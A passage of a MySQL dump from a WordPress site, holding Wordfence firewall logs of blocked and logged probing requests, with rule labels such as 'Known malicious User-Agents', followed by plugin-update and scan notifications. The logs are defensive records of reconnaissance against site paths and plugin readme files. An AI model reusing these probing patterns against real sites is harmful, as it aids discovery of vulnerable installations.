Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9CYXNlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134591,1700147003.521556,1700147003.509200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134602,1700147227.665088,1700147227.655800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134592,1700147001.553154,1700147001.544400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/utils.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3V0aWxzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134593,1700146999.544590,1700146999.535700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/spacing.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NwYWNpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134601,1700147229.297927,1700147229.289100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134594,1700146997.531817,1700146997.522100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/shadow.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NoYWRvdy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134595,1700146995.506295,1700146995.497500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/settings.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134600,1700147232.921025,1700147232.912200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134596,1700146993.409966,1700146993.401500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/position.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3Bvc2l0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134599,1700147108.800109,1700147108.795100,0x00000000000000000000FFFF80C75146,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/woocommerce-payments/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134597,1700146991.585139,1700146991.563200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/layout.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2xheW91dC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134598,1700147108.800312,1700147108.795100,0x00000000000000000000FFFF80C75146,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/woocommerce-payments/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wYXltZW50cy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}');
/*!40000 ALTER TABLE `wpcl_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfhits` with 1989 row(s)
--

--
-- Table structure for table `wpcl_wpgmza_polygon`
--

DROP TABLE IF EXISTS `wpcl_wpgmza_polygon`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpgmza_polygon` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `map_id` int(11) NOT NULL,
  `polydata` longtext NOT NULL,
  `description` text NOT NULL,
  `innerpolydata` longtext NOT NULL,
  `linecolor` varchar(7) NOT NULL,
  `lineopacity` varchar(7) NOT NULL,
  `fillcolor` varchar(7) NOT NULL,
  `opacity` varchar(3) NOT NULL,
  `title` varchar(250) NOT NULL,
  `link` varchar(700) NOT NULL,
  `ohfillcolor` varchar(7) NOT NULL,
  `ohlinecolor` varchar(7) NOT NULL,
  `ohopacity` varchar(3) NOT NULL,
  `polyname` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpgmza_polygon`
--

LOCK TABLES `wpcl_wpgmza_polygon` WRITE;
/*!40000 ALTER TABLE `wpcl_wpgmza_polygon` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpgmza_polygon` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpgmza_polygon` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfnotifications`
--

DROP TABLE IF EXISTS `wpcl_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfnotifications`
--

LOCK TABLES `wpcl_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wpcl_wfnotifications` DISABLE KEYS */;
INSERT INTO `wpcl_wfnotifications` VALUES ('site-AEAAAAA',0,'wfplugin_updates',502,1586706551,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1586706551,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-U4AQAAA',0,'wfplugin_scan',502,1590763679,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-VIAQAAA',0,'wfplugin_updates',502,1587833260,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-4AAQAAA',0,'wfplugin_updates',502,1588439350,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-BEBAAAA',0,'wfplugin_updates',502,1590763679,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-P4BAAAA',0,'wfplugin_updates',502,1591928680,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-QABAAAA',0,'wfplugin_scan',502,1591928680,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-Z4BAAAA',0,'wfplugin_updates',502,1593549415,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-2ABAAAA',0,'wfplugin_scan',502,1595639921,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-EMBQAAA',0,'wfplugin_updates',502,1594089717,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-IABQAAA',0,'wfplugin_updates',502,1595441683,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-SEBQAAA',0,'wfplugin_updates',502,1595949223,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">Updates are available for 2 themes</a>','[]'),('site-SIBQAAA',0,'wfplugin_scan',502,1595949223,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-UUBQAAA',0,'wfplugin_updates',502,1596729199,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-UYBQAAA',0,'wfplugin_scan',502,1596729199,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-ZEBQAAA',0,'wfplugin_updates',502,1597161776,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">Updates are available for 2 plugins</a>','[]'),('site-ZIBQAAA',0,'wfplugin_scan',502,1597161776,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-4ABQAAA',0,'wfplugin_updates',502,1597591944,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-4EBQAAA',0,'wfplugin_scan',502,1597591944,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-BACAAAA',0,'wfplugin_updates',502,1598215250,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-BECAAAA',0,'wfplugin_scan',502,1598215250,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-EUCAAAA',0,'wfplugin_updates',502,1599070899,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-EYCAAAA',0,'wfplugin_scan',502,1599070899,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-MECAAAA',0,'wfplugin_updates',502,1599516594,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-MICAAAA',0,'wfplugin_scan',502,1599446926,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-MYCAAAA',0,'wfplugin_updates',502,1599768184,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-M4CAAAA',0,'wfplugin_scan',502,1599768184,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-NUCAAAA',0,'wfplugin_updates',502,1600195239,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-OACAAAA',0,'wfplugin_updates',502,1600442178,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-OECAAAA',0,'wfplugin_scan',502,1600442178,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-OQCAAAA',0,'wfplugin_updates',502,1601066011,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-OUCAAAA',0,'wfplugin_scan',502,1601066011,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-SACAAAA',0,'wfplugin_updates',502,1602788271,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-SECAAAA',0,'wfplugin_scan',502,1602788271,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-3YCAAAA',0,'wfplugin_updates',502,1602881905,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-34CAAAA',0,'wfplugin_updates',502,1605714904,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-4ACAAAA',0,'wfplugin_scan',502,1604193461,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-MUCQAAA',0,'wfplugin_updates',502,1606242546,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-EACQAAA',0,'wfplugin_scan',502,1605714904,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-MYCQAAA',0,'wfplugin_scan',502,1606242512,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-PUCQAAA',0,'wfplugin_updates',502,1606665328,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-PYCQAAA',0,'wfplugin_scan',502,1606665328,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-SUCQAAA',0,'wfplugin_updates',502,1607105717,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-SYCQAAA',0,'wfplugin_scan',502,1607105717,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-WECQAAA',0,'wfplugin_updates',502,1607399271,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-WICQAAA',0,'wfplugin_scan',502,1607399271,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-YQCQAAA',0,'wfplugin_updates',502,1608139883,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-YUCQAAA',0,'wfplugin_scan',502,1607527955,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-2QCQAAA',0,'wfplugin_scan',502,1608139883,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-7YCQAAA',0,'wfplugin_updates',502,1608574734,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-74CQAAA',0,'wfplugin_scan',502,1608574734,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-CQDAAAA',0,'wfplugin_updates',502,1609019300,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-CUDAAAA',0,'wfplugin_scan',502,1609019300,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-FADAAAA',0,'wfplugin_updates',502,1609291091,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-FEDAAAA',0,'wfplugin_scan',502,1609291094,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-FIDAAAA',0,'wfplugin_updates',502,1610124279,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-FMDAAAA',0,'wfplugin_scan',502,1610124279,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-JUDAAAA',0,'wfplugin_updates',502,1610652308,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-J4DAAAA',0,'wfplugin_scan',502,1610652308,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-MUDAAAA',0,'wfplugin_updates',502,1611779760,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-MYDAAAA',0,'wfplugin_scan',502,1611779717,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-S4DAAAA',0,'wfplugin_updates',502,1622296350,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-TMDAAAA',0,'wfplugin_scan',502,1622296350,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-7IEAAAA',0,'wfplugin_updates',502,1623771683,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-7MEAAAA',0,'wfplugin_scan',502,1639418689,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-IYEQAAA',0,'wfplugin_updates',502,1624566714,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-MYEQAAA',0,'wfplugin_updates',502,1625153386,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 2 plugins</a>','[]'),('site-OYEQAAA',0,'wfplugin_updates',502,1626275071,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-UUEQAAA',0,'wfplugin_updates',502,1626621560,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-XAEQAAA',0,'wfplugin_updates',502,1629128925,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-JQFAAAA',0,'wfplugin_updates',502,1629378814,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-LEFAAAA',0,'wfplugin_updates',502,1630265620,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-REFAAAA',0,'wfplugin_updates',502,1630682946,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 2 plugins</a>','[]'),('site-TUFAAAA',0,'wfplugin_updates',502,1632611442,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6MFAAAA',0,'wfplugin_updates',502,1633456661,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('network-GQ2TGNZU',0,'toupp-20210927',100,1637595645,'<p><strong>Wordfence Terms of Use and Privacy Policy Updated</strong></p>\n<p>Please review the updated Wordfence Terms of Use and Privacy Policy. We have incorporated the new versions of the Standard Contractual Clauses issued by the European Commission.</p>\n<p><a href=\"https://www.wordfence.com/terms-of-use/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20210927\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Use</a> <a href=\"https://www.wordfence.com/privacy-policy/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20210927\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Privacy Policy</a></p>','[]'),('site-FYFQAAA',0,'wfplugin_updates',502,1634571625,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-KMFQAAA',0,'wfplugin_updates',502,1635271503,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-PQFQAAA',0,'wfplugin_updates',502,1636228050,'<a 